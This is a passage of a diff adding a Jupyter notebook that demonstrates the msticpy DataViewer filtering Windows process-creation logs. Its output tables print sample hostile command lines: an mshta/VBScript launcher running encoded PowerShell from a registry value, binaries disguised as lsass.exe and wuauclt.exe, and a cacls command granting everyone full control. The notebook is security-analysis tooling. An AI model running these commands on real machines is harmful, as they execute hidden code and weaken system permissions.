"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\"],\"index\":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,160,161,162,163,164,165,166,167,168,169,170,171,172,173,174,175,176,177,178,179,180,181,182,183,184,185,186,187,188,189,190,191,192,193,194,195,196,197,198,199,200,201,202,203,204,205,206,207,208,209,210,211,212,213,214,215,216,217,218,219,220,221,222,223,224,225,226,227,228,229,230,231,232,233,234,235,236,237,238,239,240,241,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,261,262,263,264,265,266,267,268,269,270,271,272,273,274,275,276,277,278,279,280,281,282,283,284,285,286,287,288,289,290,291,292,293,294,295,296,297,298,299,300,301,302,303,304,305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,335,336,337,338,339,340,341,342,343,344,345,346,347,348,349,350,351,352,353,354,355,356,357,358,359,360,361,362]},\"selected\":{\"id\":\"1896\"},\"selection_policy\":{\"id\":\"1897\"}},\"id\":\"1779\",\"type\":\"ColumnDataSource\"},{\"attributes\":{\"booleans\":[false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,true,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,true,false,false,false,false,false,false,false,false,false,false,false,false,false,true,false,false,false,false,false,false,false,false,false,false,false,false,false,true,false,false,true,true,false,false,false,false,false,false,false,false,true,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false]},\"id\":\"1812\",\"type\":\"BooleanFilter\"},{\"attributes\":{\"editor\":{\"id\":\"1904\"},\"field\":\"Computer\",\"formatter\":{\"id\":\"1903\"},\"title\":\"Computer\",\"width\":15},\"id\":\"1805\",\"type\":\"TableColumn\"},{\"attributes\":{\"editor\":{\"id\":\"1910\"},\"field\":\"ParentProcessName\",\"formatter\":{\"id\":\"1909\"},\"title\":\"ParentProcessName\",\"width\":73},\"id\":\"1808\",\"type\":\"TableColumn\"},{\"attributes\":{},\"id\":\"1905\",\"type\":\"StringFormatter\"},{\"attributes\":{},\"id\":\"1900\",\"type\":\"StringFormatter\"},{\"attributes\":{},\"id\":\"1901\",\"type\":\"StringEditor\"},{\"attributes\":{},\"id\":\"1906\",\"type\":\"StringEditor\"},{\"attributes\":{},\"id\":\"1902\",\"type\":\"StringEditor\"},{\"attributes\":{},\"id\":\"1897\",\"type\":\"UnionRenderers\"},{\"attributes\":{},\"id\":\"1904\",\"type\":\"StringEditor\"},{\"attributes\":{\"format\":\"%F %T\"},\"id\":\"1809\",\"type\":\"DateFormatter\"},{\"attributes\":{\"editor\":{\"id\":\"1908\"},\"field\":\"CommandLine\",\"formatter\":{\"id\":\"1907\"},\"title\":\"CommandLine\",\"width\":125},\"id\":\"1807\",\"type\":\"TableColumn\"},{\"attributes\":{\"editor\":{\"id\":\"1906\"},\"field\":\"NewProcessName\",\"formatter\":{\"id\":\"1905\"},\"title\":\"NewProcessName\",\"width\":52},\"id\":\"1806\",\"type\":\"TableColumn\"},{\"attributes\":{},\"id\":\"1909\",\"type\":\"StringFormatter\"}],\"root_ids\":[\"1801\"]},\"title\":\"Bokeh Application\",\"version\":\"2.3.2\"}};\n",
+       "  var render_items = [{\"docid\":\"64015a85-dd87-47e6-a6eb-8974bf509dca\",\"notebook_comms_target\":\"1911\",\"root_ids\":[\"1801\"],\"roots\":{\"1801\":\"277f4152-464f-468f-a691-b8b365abe662\"}}];\n",
+       "  root.Bokeh.embed.embed_items_notebook(docs_json, render_items);\n",
+       "\n",
+       "  }\n",
+       "  if (root.Bokeh !== undefined) {\n",
+       "    embed_document(root);\n",
+       "  } else {\n",
+       "    var attempts = 0;\n",
+       "    var timer = setInterval(function(root) {\n",
+       "      if (root.Bokeh !== undefined) {\n",
+       "        clearInterval(timer);\n",
+       "        embed_document(root);\n",
+       "      } else {\n",
+       "        attempts++;\n",
+       "        if (attempts > 100) {\n",
+       "          clearInterval(timer);\n",
+       "          console.log(\"Bokeh: ERROR: Unable to run BokehJS code because BokehJS library is missing\");\n",
+       "        }\n",
+       "      }\n",
+       "    }, 10, root)\n",
+       "  }\n",
+       "})(window);"
+      ],
+      "application/vnd.bokehjs_exec.v0+json": ""
+     },
+     "metadata": {
+      "application/vnd.bokehjs_exec.v0+json": {
+       "id": "1801"
+      }
+     },
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/vnd.jupyter.widget-view+json": {
+       "model_id": "c36a852fa7dd4469bed195022bcedcba",
+       "version_major": 2,
+       "version_minor": 0
+      },
+      "text/plain": [
+       "Accordion(children=(VBox(children=(VBox(children=(Text(value='', description='Filter:', style=DescriptionStyle…"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "viewer = DataViewer(data, selected_cols=columns)\n",
+    "\n",
+    "sample_q_filter = {\n",
+    "    \"EventID query 'ParentProcessName.str.contains('cmd') and (CommandLine.str.contains('cacls') or CommandLine.str.contains('script'))'\": (\n",
+    "        \"EventID\",\n",
+    "        False,\n",
+    "        \"query\",\n",
+    "        \"ParentProcessName.str.contains('cmd') and (CommandLine.str.contains('cacls') or CommandLine.str.contains('script'))\",\n",
+    "    )\n",
+    "}\n",
+    "viewer.import_filters(sample_q_filter)\n",
+    "# We're opening the \"Choose columns\" drop-down programmatically\n",
+    "# Just click on the small arrow to the left of \"Choose columns\" to open this\n",
+    "viewer.accordion.selected_index = 1\n",
+    "viewer"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "# Accessing the filtered data\n",
+    "\n",
+    "Use the `filtered_data` property of the DataViewer to retrieve\n",
+    "a DataFrame corresponding to the current column and row filtering.\n",
+    "\n",
+    "> Note column sorting is not captured in this data."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 9,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>Account</th>\n",
+       "      <th>EventID</th>\n",
+       "      <th>TimeGenerated</th>\n",
+       "      <th>Computer</th>\n",
+       "      <th>NewProcessName</th>\n",
+       "      <th>CommandLine</th>\n",
+       "      <th>ParentProcessName</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>58</th>\n",
+       "      <td>MSTICAlertsWin1\\MSTICAdmin</td>\n",
+       "      <td>4688</td>\n",
+       "      <td>2019-01-15 05:15:16.663</td>\n",
+       "      <td>MSTICAlertsWin1</td>\n",
+       "      <td>C:\\Diagnostics\\UserTmp\\rundll32.exe</td>\n",
+       "      <td>.\\rundll32.exe  /C mshtml,RunHTMLApplication j...</td>\n",
+       "      <td>C:\\Windows\\System32\\cmd.exe</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>162</th>\n",
+       "      <td>MSTICAlertsWin1\\MSTICAdmin</td>\n",
+       "      <td>4688</td>\n",
+       "      <td>2019-01-15 05:15:16.020</td>\n",
+       "      <td>MSTICAlertsWin1</td>\n",
+       "      <td>C:\\Diagnostics\\UserTmp\\cmd.exe</td>\n",
+       "      <td>cmd  /c C:\\Windows\\System32\\mshta.exe vbscript...</td>\n",
+       "      <td>C:\\Windows\\System32\\cmd.exe</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>176</th>\n",
+       "      <td>MSTICAlertsWin1\\MSTICAdmin</td>\n",
+       "      <td>4688</td>\n",
+       "      <td>2019-01-15 05:15:18.080</td>\n",
+       "      <td>MSTICAlertsWin1</td>\n",
+       "      <td>C:\\Diagnostics\\UserTmp\\wuauclt.exe</td>\n",
+       "      <td>.\\wuauclt.exe  /C \"c:\\windows\\softwaredistribu...</td>\n",
+       "      <td>C:\\Windows\\System32\\cmd.exe</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>190</th>\n",
+       "      <td>MSTICAlertsWin1\\MSTICAdmin</td>\n",
+       "      <td>4688</td>\n",
+       "      <td>2019-01-15 05:15:18.287</td>\n",
+       "      <td>MSTICAlertsWin1</td>\n",
+       "      <td>C:\\Diagnostics\\UserTmp\\lsass.exe</td>\n",
+       "      <td>.\\lsass.exe  /C \"c:\\windows\\softwaredistributi...</td>\n",
+       "      <td>C:\\Windows\\System32\\cmd.exe</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>193</th>\n",
+       "      <td>MSTICAlertsWin1\\MSTICAdmin</td>\n",
+       "      <td>4688</td>\n",
+       "      <td>2019-01-15 05:15:18.337</td>\n",
+       "      <td>MSTICAlertsWin1</td>\n",
+       "      <td>C:\\Diagnostics\\UserTmp\\cmd.exe</td>\n",
+       "      <td>cmd  /c \"powershell wscript.shell used to down...</td>\n",
+       "      <td>C:\\Windows\\System32\\cmd.exe</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>194</th>\n",
+       "      <td>MSTICAlertsWin1\\MSTICAdmin</td>\n",
+       "      <td>4688</td>\n",
+       "      <td>2019-01-15 05:15:18.403</td>\n",
+       "      <td>MSTICAlertsWin1</td>\n",
+       "      <td>C:\\Diagnostics\\UserTmp\\cacls.exe</td>\n",
+       "      <td>cacls.exe  c:\\windows\\system32\\wscript.exe /e ...</td>\n",
+       "      <td>C:\\Windows\\System32\\cmd.exe</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>203</th>\n",
+       "      <td>MSTICAlertsWin1\\MSTICAdmin</td>\n",
+       "      <td>4688</td>\n",
+       "      <td>2019-01-15 05:15:18.820</td>\n",
+       "      <td>MSTICAlertsWin1</td>\n",
+       "      <td>C:\\Diagnostics\\UserTmp\\cmd.exe</td>\n",
+       "      <td>cmd  /c echo /e:vbscript.encode /b</td>\n",
+       "      <td>C:\\Windows\\System32\\cmd.exe</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "                        Account  EventID           TimeGenerated  \\\n",
+       "58   MSTICAlertsWin1\\MSTICAdmin     4688 2019-01-15 05:15:16.663   \n",
+       "162  MSTICAlertsWin1\\MSTICAdmin     4688 2019-01-15 05:15:16.020   \n",
+       "176  MSTICAlertsWin1\\MSTICAdmin     4688 2019-01-15 05:15:18.080   \n",
+       "190  MSTICAlertsWin1\\MSTICAdmin     4688 2019-01-15 05:15:18.287   \n",
+       "193  MSTICAlertsWin1\\MSTICAdmin     4688 2019-01-15 05:15:18.337   \n",
+       "194  MSTICAlertsWin1\\MSTICAdmin     4688 2019-01-15 05:15:18.403   \n",
+       "203  MSTICAlertsWin1\\MSTICAdmin     4688 2019-01-15 05:15:18.820   \n",
+       "\n",
+       "            Computer                       NewProcessName  \\\n",
+       "58   MSTICAlertsWin1  C:\\Diagnostics\\UserTmp\\rundll32.exe   \n",
+       "162  MSTICAlertsWin1       C:\\Diagnostics\\UserTmp\\cmd.exe   \n",
+       "176  MSTICAlertsWin1   C:\\Diagnostics\\UserTmp\\wuauclt.exe   \n",
+       "190  MSTICAlertsWin1     C:\\Diagnostics\\UserTmp\\lsass.exe   \n",
+       "193  MSTICAlertsWin1       C:\\Diagnostics\\UserTmp\\cmd.exe   \n",
+       "194  MSTICAlertsWin1     C:\\Diagnostics\\UserTmp\\cacls.exe   \n",
+       "203  MSTICAlertsWin1       C:\\Diagnostics\\UserTmp\\cmd.exe   \n",
+       "\n",
+       "                                           CommandLine  \\\n",
+       "58   .\\rundll32.exe  /C mshtml,RunHTMLApplication j...   \n",
+       "162  cmd  /c C:\\Windows\\System32\\mshta.exe vbscript...   \n",
+       "176  .\\wuauclt.exe  /C \"c:\\windows\\softwaredistribu...   \n",
+       "190  .\\lsass.exe  /C \"c:\\windows\\softwaredistributi...   \n",
+       "193  cmd  /c \"powershell wscript.shell used to down...   \n",
+       "194  cacls.exe  c:\\windows\\system32\\wscript.exe /e ...   \n",
+       "203                 cmd  /c echo /e:vbscript.encode /b   \n",
+       "\n",
+       "               ParentProcessName  \n",
+       "58   C:\\Windows\\System32\\cmd.exe  \n",
+       "162  C:\\Windows\\System32\\cmd.exe  \n",
+       "176  C:\\Windows\\System32\\cmd.exe  \n",
+       "190  C:\\Windows\\System32\\cmd.exe  \n",
+       "193  C:\\Windows\\System32\\cmd.exe  \n",
+       "194  C:\\Windows\\System32\\cmd.exe  \n",
+       "203  C:\\Windows\\System32\\cmd.exe  "
+      ]
+     },
+     "execution_count": 9,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "viewer.filtered_data"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "# DataViewer Help"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 10,
+   "metadata": {},
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "Help on class DataViewer in module msticpy.nbtools.data_viewer:\n",
+      "\n",
+      "class DataViewer(builtins.object)\n",
+      " |  DataViewer(data: pandas.core.frame.DataFrame, selected_cols: List[str] = None, debug=False)\n",
+      " |  \n",
+      " |  Data viewer class.\n",
+      " |  \n",
+      " |  Methods defined here:\n",
+      " |  \n",
+      " |  __init__(self, data: pandas.core.frame.DataFrame, selected_cols: List[str] = None, debug=False)\n",
+      " |      Initialize the DataViewer class.\n",
+      " |      \n",
+      " |      Parameters\n",
+      " |      ----------\n",
+      " |      data : pd.DataFrame\n",
+      " |          The DataFrame to view\n",
+      " |      selected_cols : List[str], optional\n",
+      " |          Initial subset of columns to show, by default None (all cols)\n",
+      " |      debug : bool\n",
+      " |          Output additional debugging info to std out.\n",
+      " |  \n",
+      " |  display(self)\n",
+      " |      Display the widget.\n",
+      " |  \n",
+      " |  import_filters(self, filters: Dict[str, msticpy.nbtools.data_viewer.FilterExpr])\n",
+      " |      Import filter set replacing current filters.\n",
+      " |      \n",
+      " |      Parameters\n",
+      " |      ----------\n",
+      " |      filters : Dict[str, FilterExpr]\n",
+      " |          dict of filter name, FilterExpr\n",
+      " |          FilterExpr is a tuple of:\n",
+      " |          column [str], inv [bool], operator [str], expr [str]\n",
+      " |  \n",
+      " |  show(self)\n",
+      " |      Display the data table control.\n",
+      " |  \n",
+      " |  ----------------------------------------------------------------------\n",
+      " |  Data descriptors defined here:\n",
+      " |  \n",
+      " |  __dict__\n",
+      " |      dictionary for instance variables (if defined)\n",
+      " |  \n",
+      " |  __weakref__\n",
+      " |      list of weak references to the object (if defined)\n",
+      " |  \n",
+      " |  filtered_data\n",
+      " |      Return filtered dataframe.\n",
+      " |  \n",
+      " |  filters\n",
+      " |      Return current filters as a dict.\n",
+      "\n"
+     ]
+    }
+   ],
+   "source": [
+    "help(DataViewer)"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 11,
+   "metadata": {},
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "==========================  =========  ==========================  ===============  ===================================  =====================================================================================================================================================================================================================================  ===========================\n",
+      "Account                       EventID  TimeGenerated               Computer         NewProcessName                       CommandLine                                                                                                                                                                                                                            ParentProcessName\n",
+      "==========================  =========  ==========================  ===============  ===================================  =====================================================================================================================================================================================================================================  ===========================\n",
+      "MSTICAlertsWin1\\MSTICAdmin       4688  2019-01-15 05:15:16.663000  MSTICAlertsWin1  C:\\Diagnostics\\UserTmp\\rundll32.exe  .\\rundll32.exe  /C mshtml,RunHTMLApplication javascript:alert(tada!)                                                                                                                                                                   C:\\Windows\\System32\\cmd.exe\n",
+      "MSTICAlertsWin1\\MSTICAdmin       4688  2019-01-15 05:15:16.020000  MSTICAlertsWin1  C:\\Diagnostics\\UserTmp\\cmd.exe       cmd  /c C:\\Windows\\System32\\mshta.exe vbscript:CreateObject(\"Wscript.Shell\").Run(\".\\powershell.exe -c \"\"$x=$((gp HKLM:Software\\Microsoft\\Windows\\CurrentVersion Certificate).Certificate);.\\powershell -E $y\"\"\",0,True)(window.close)  C:\\Windows\\System32\\cmd.exe\n",
+      "MSTICAlertsWin1\\MSTICAdmin       4688  2019-01-15 05:15:18.080000  MSTICAlertsWin1  C:\\Diagnostics\\UserTmp\\wuauclt.exe   .\\wuauclt.exe  /C \"c:\\windows\\softwaredistribution\\cscript.exe\"                                                                                                                                                                        C:\\Windows\\System32\\cmd.exe\n",
+      "MSTICAlertsWin1\\MSTICAdmin       4688  2019-01-15 05:15:18.287000  MSTICAlertsWin1  C:\\Diagnostics\\UserTmp\\lsass.exe     .\\lsass.exe  /C \"c:\\windows\\softwaredistribution\\cscript.exe\"                                                                                                                                                                          C:\\Windows\\System32\\cmd.exe\n",
+      "MSTICAlertsWin1\\MSTICAdmin       4688  2019-01-15 05:15:18.337000  MSTICAlertsWin1  C:\\Diagnostics\\UserTmp\\cmd.exe       cmd  /c \"powershell wscript.shell used to download a .gif\"                                                                                                                                                                             C:\\Windows\\System32\\cmd.exe\n",
+      "MSTICAlertsWin1\\MSTICAdmin       4688  2019-01-15 05:15:18.403000  MSTICAlertsWin1  C:\\Diagnostics\\UserTmp\\cacls.exe     cacls.exe  c:\\windows\\system32\\wscript.exe /e /t /g everyone:f                                                                                                                                                                         C:\\Windows\\System32\\cmd.exe\n",
+      "MSTICAlertsWin1\\MSTICAdmin       4688  2019-01-15 05:15:18.820000  MSTICAlertsWin1  C:\\Diagnostics\\UserTmp\\cmd.exe       cmd  /c echo /e:vbscript.encode /b                                                                                                                                                                                                     C:\\Windows\\System32\\cmd.exe\n",
+      "==========================  =========  ==========================  ===============  ===================================  =====================================================================================================================================================================================================================================  ===========================\n"
+     ]
+    }
+   ],
+   "source": [
+    "import tabulate\n",
+    "print(tabulate.tabulate(viewer.filtered_data, tablefmt=\"rst\", showindex=False, headers=\"keys\"))"
+   ]
+  }
+ ],
+ "metadata": {
+  "kernelspec": {
+   "display_name": "Python (condadev)",
+   "language": "python",
+   "name": "condadev"
+  },
+  "language_info": {
+   "codemirror_mode": {
+    "name": "ipython",
+    "version": 3
+   },
+   "file_extension": ".py",
+   "mimetype": "text/x-python",
+   "name": "python",
+   "nbconvert_exporter": "python",
+   "pygments_lexer": "ipython3",
+   "version": "3.7.10"
+  },
+  "widgets": {
+   "application/vnd.jupyter.widget-state+json": {
+    "state": {
+     "007afbb0564c460386581a0c37f92acc": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonModel",
+      "state": {
+       "description": "Clear all filters",
+       "layout": "IPY_MODEL_0d64314ec34e4a2f92ddfe414a23ee1e",
+       "style": "IPY_MODEL_c95fc31b16f740f7881c833b80dc0ff6"
+      }
+     },
+     "01b4914177cb4ea588ff91eb73cb18d2": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "01ceaecf10814b35a94144766cb7ca53": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonStyleModel",
+      "state": {}
+     },
+     "01e9b5b9e2f948f8b02f10bd0e2d2581": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "0354b7441ac24daaaaed54717c3d29ca": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": "initial"
+      }
+     },
+     "0468790673594a8daa18a9805bf3db84": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": "initial"
+      }
+     },
+     "04899dd06bc14392a9e48b80cad6f8f6": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "width": "70%"
+      }
+     },
+     "04ff5b81dc504d3b98f6e052da918363": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "VBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_388666284cd2420d82603b3470fb3569",
+        "IPY_MODEL_d840b505fd474fc587b39b8624adf0bf"
+       ],
+       "layout": "IPY_MODEL_4b4df991eb764acba40c4005635698cc"
+      }
+     },
+     "051ad9f6b3e941e996df3e4b7dd5a3c3": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "HBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_9062d54a43f14eff95ada0765412d70c",
+        "IPY_MODEL_9414237db4a44f64833c7e9743a5d522",
+        "IPY_MODEL_e2328c04c2de42f989a5029717800568",
+        "IPY_MODEL_7059d69c5ec4412aa91247741509c2be"
+       ],
+       "layout": "IPY_MODEL_ef0ff907f7944bf0995004e685b6309e"
+      }
+     },
+     "053405d2adb34f11a7a8e696006a0ba9": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "height": "200px",
+       "width": "40%"
+      }
+     },
+     "05819ecfa0a84cb6bc1da256ad6b2806": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "VBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_6db387e0ce73474ebbc9b81d9a6b65cc",
+        "IPY_MODEL_0f2cdd95ce36432bb5568c1cd517d194"
+       ],
+       "layout": "IPY_MODEL_f49a1b720a034428aeaf34e514aea0a8"
+      }
+     },
+     "06248439df564c268fb7ad0e58f35808": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": ""
+      }
+     },
+     "077317f3b9dc4febacc1ec8a17237f44": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonStyleModel",
+      "state": {}
+     },
+     "08852b76afe74c028723879733117fdd": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonModel",
+      "state": {
+       "description": "Apply columns",
+       "layout": "IPY_MODEL_b6b48710a238432db8fbc85f95d965c8",
+       "style": "IPY_MODEL_75aaf991c6b74e658fa302082b2b9ccb"
+      }
+     },
+     "0967ee4b00824fb984366a39c0c73f13": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "09c5521bc8ca478b8ca2930b32c2f6f3": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DropdownModel",
+      "state": {
+       "_options_labels": [
+        "==",
+        "contains",
+        "matches",
+        "in",
+        "between",
+        "query"
+       ],
+       "index": 1,
+       "layout": "IPY_MODEL_b331bba272ed438aa05e46dddfea7cdb",
+       "style": "IPY_MODEL_5edf1b17f727492681224d545bbdc9da"
+      }
+     },
+     "09f33472219641b89332f93f49ed773f": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonModel",
+      "state": {
+       "description": "Apply columns",
+       "layout": "IPY_MODEL_edc7b60605b14803a11f32010de9f9dd",
+       "style": "IPY_MODEL_92d6d1021cab4afc82932377c5826a57"
+      }
+     },
+     "0a721017793d455a820c6aeaf902ff33": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": ""
+      }
+     },
+     "0aae3189ccb6445b88597d671659fe81": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "0b1aad3a831b4a57ab9463d831a3c630": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonModel",
+      "state": {
+       "description": "Clear all filters",
+       "layout": "IPY_MODEL_eb3dc04670bd49e5a34fadf671232fb0",
+       "style": "IPY_MODEL_73d4b2b7a2004f4dab1647763895ad11"
+      }
+     },
+     "0b50cc97034944ca87ec5c6d415ad132": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "LabelModel",
+      "state": {
+       "layout": "IPY_MODEL_97a4e6e8b84e4da4b43cf9888aad5c47",
+       "style": "IPY_MODEL_f5f1db4d825c4c669f6c4b75ceaa636d",
+       "value": "Enter multiple values separated by commas. Strings do not need quotes."
+      }
+     },
+     "0b5205cdc4a14e4bba53cd6c04d3bf17": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "0c442da2b2b94765ba2116badd5ed9a3": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "SelectModel",
+      "state": {
+       "description": "Filters",
+       "index": null,
+       "layout": "IPY_MODEL_dacfd3a9a0b34000bae4e67a85ca250a",
+       "style": "IPY_MODEL_8450c56dd9974440a252629859e30d02"
+      }
+     },
+     "0d64314ec34e4a2f92ddfe414a23ee1e": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "0d905ec2606940e787eca46cade1ab9d": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "LabelModel",
+      "state": {
+       "layout": "IPY_MODEL_5ecb8ec617804e2a9b295945d98f680d",
+       "style": "IPY_MODEL_c541a659ef5247de88274ce099e211cc",
+       "value": "Current filters"
+      }
+     },
+     "0dbc6f3f4b5c4b5bb4cd2158eac7abcc": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": ""
+      }
+     },
+     "0e6ce2977dbb4f9399699b3d650b23fb": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "0f2cdd95ce36432bb5568c1cd517d194": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "HBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_f89dd23f69274462bbc7cf9024d352e6",
+        "IPY_MODEL_99ed9f340e444401a3934a1451bb3171"
+       ],
+       "layout": "IPY_MODEL_b572c2e3d2f94056b6260ceb71ad4dea"
+      }
+     },
+     "0f6cd28d4dc44a54be10c3bb6488a283": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "width": "400px"
+      }
+     },
+     "0f78cf60c57442c7962936dc5129fb1f": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "VBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_3828cc1ef0af4a358e7206ac8d36c8d2",
+        "IPY_MODEL_ecc9cf108d494c27b2e982c04e75b1e6"
+       ],
+       "layout": "IPY_MODEL_e6db1929109d48c19ca8b42095c4496d"
+      }
+     },
+     "0ff353fb41fd4ed58826f9effa2b5a18": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
